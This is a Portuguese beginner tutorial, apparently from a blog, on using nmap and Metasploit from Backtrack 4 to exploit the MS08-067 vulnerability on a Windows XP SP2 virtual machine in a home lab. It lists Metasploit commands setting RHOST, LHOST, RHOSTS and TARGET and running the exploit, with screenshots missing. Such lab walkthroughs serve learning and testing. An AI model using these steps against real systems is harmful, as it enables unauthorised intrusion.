Escolar Documentos
Profissional Documentos
Cultura Documentos
Neste caso, são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs,
estão configuradas como bridge.
Quer saber mais sobre virtualbox? Digite "virtualbox" no google que encontrará ótimos artigos/dicas sobre
o mesmo.
Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna.
Abra um terminal no micro com o backtrack e digite a seguinte sintaxe:
set RHOST 192.168.0.186 <------ Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM
com Windows XP SP2
set LHOST 192.168.0.170 <------ Aqui setamos nosso host local, que no caso é o endereço IP da VM
com Backtrack 4.
Ok! Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit.
Opções Metasploit
Quando executamos o comando exploit, será realizado um "fingerprint" para a detecção do Sistema
Operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.
Como vimos atráves do script do nmap que nosso alvo é vulnerável, podemos "nós" realizar o processo de
fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar esta
etapa, gerando possibilidades menores de erros.
Certo, mais como? Poderiamos fazer utilizando o nmap, mais vamos utilizar um módulo auxiliar presente
no metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio.
set RHOSTS 192.168.0.186 <---- Aqui eu setei um único host (192.168.0.186), mais poderia especificar
um range, exemplo, 192.168.0.0/24.
Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a
opção set TARGET.
set RHOST 192.168.0.186 <------ Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM
com Windows XP SP2
set LHOST 192.168.0.170 <------ Aqui setamos nosso host local, que no caso é o endereço IP da VM
com Backtrack 4.
exploit <------ E finalmente executamos nosso exploit. Na imagem abaixo, é listado com o comando show
targets, todos os S.O.s vulneráveis a este exploit (ms08_067).
Veja abaixo que irei utilizar a opção 31.
Veja que não foi realizado a etapa de fingerprint com o alvo, pois "falamos" para o exploit, o S.O. que ele
encontrará em seu destino.
É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit.
Como continuação, poderão seguir o outro artigo que escrevi sobre o Metasploit.
Metasploit Exploitation
http://codesec.blogspot.com/2010/02/metasploit-exploitation.html
Abraços a todos!